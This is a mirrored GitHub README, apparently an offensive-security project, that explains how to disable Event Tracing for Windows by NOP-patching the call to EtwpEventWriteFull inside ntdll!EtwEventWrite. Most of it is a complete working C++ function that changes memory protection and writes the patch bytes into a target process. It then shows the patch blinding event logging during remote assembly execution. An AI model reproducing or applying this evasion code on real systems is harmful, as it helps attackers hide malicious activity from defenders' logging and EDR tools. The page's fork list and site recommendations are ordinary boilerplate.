Code Monkey home page Code Monkey logo

etwpatching's Introduction

Patching ETW

Event Tracing for Windows (ETW) provides a mechanism to trace and log events that are raised by user-mode applications and kernel-mode drivers.

ntdll!EtwEventWrite is responsible for writing an event , it's not actually the function that do the Event Writing job, by reversing it, we can see that it calls ntdll!EtwpEventWriteFull that do the actual Event Writing :

IDAetw

this call is done at offset (0x214 - 0x1f0 = 0x24) and it takes 5 bytes, the idea here is to write a program that identify 0xe8 the opcode of the call instruction and overwrite this call memory with 5 bytes , so that the call will never done

TheCall

EtwPatch

Here is the full Patch function :

void patchEtwpEventWriteFull(OUT HANDLE& hProc) {

    void* etwAddr = GetProcAddress(GetModuleHandle(L"ntdll.dll"), "EtwEventWrite");

    for (BYTE offset = 0; offset <= 100; offset++) {
        if (*((PBYTE)etwAddr + offset) == 0xe8 && *((PBYTE)etwAddr + offset + 9) == 0xc3) {
            char etwPatch[] = { 0x90, 0x90, 0x90, 0x90, 0x90 };

            DWORD lpflOldProtect = 0;
            unsigned __int64 memPage = 0x1000;
            void* etwAddr_bk = (void*)(((INT_PTR)etwAddr + offset));;

            NTSTATUS NtProtectStatus1 = NtProtectVirtualMemory(hProc, (PVOID*)&etwAddr_bk, (PSIZE_T)&memPage, 0x04, &lpflOldProtect);
            if (!NT_SUCCESS(NtProtectStatus1)) {
                printf("[!] Failed in NtProtectVirtualMemory1 (%u)\n", GetLastError());
                return;
            }

            NTSTATUS NtWriteStatus = NtWriteVirtualMemory(hProc, (LPVOID)((INT_PTR)etwAddr + offset), (PVOID)etwPatch, sizeof(etwPatch), (SIZE_T*)nullptr);
            if (!NT_SUCCESS(NtWriteStatus)) {
                printf("[!] Failed in NtWriteVirtualMemory (%u)\n", GetLastError());
                return;
            }

            NTSTATUS NtProtectStatus2 = NtProtectVirtualMemory(hProc, (PVOID*)&etwAddr_bk, (PSIZE_T)&memPage, lpflOldProtect, &lpflOldProtect);
            if (!NT_SUCCESS(NtProtectStatus2)) {
                printf("[!] Failed in NtProtectVirtualMemory2 (%u)\n", GetLastError());
                return;
            }
        }
        if (*((PBYTE)etwAddr + offset) == 0xc3) {
            break;
        }
    }
    

    std::cout << "[+] Patched etw!\n";

}

Let's test it inside ExecRemoteAssembly

ETWpatching.mp4

As you can see the ntdll!EtwEventWrite failed to write Event for the current process after patching it

etwpatching's People

Stargazers

iojymbo avatar avatar

Forkers

ratandc2 fengjixuchui cvlabsio sunnyneo grimbelhax chaoscalm gavz classic130 c33dd netvipe hxlxmjxbbxs l34rn pdolinic mmyyhack inosec2 vaginessa kfriitz bravery9 an0x03e8

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.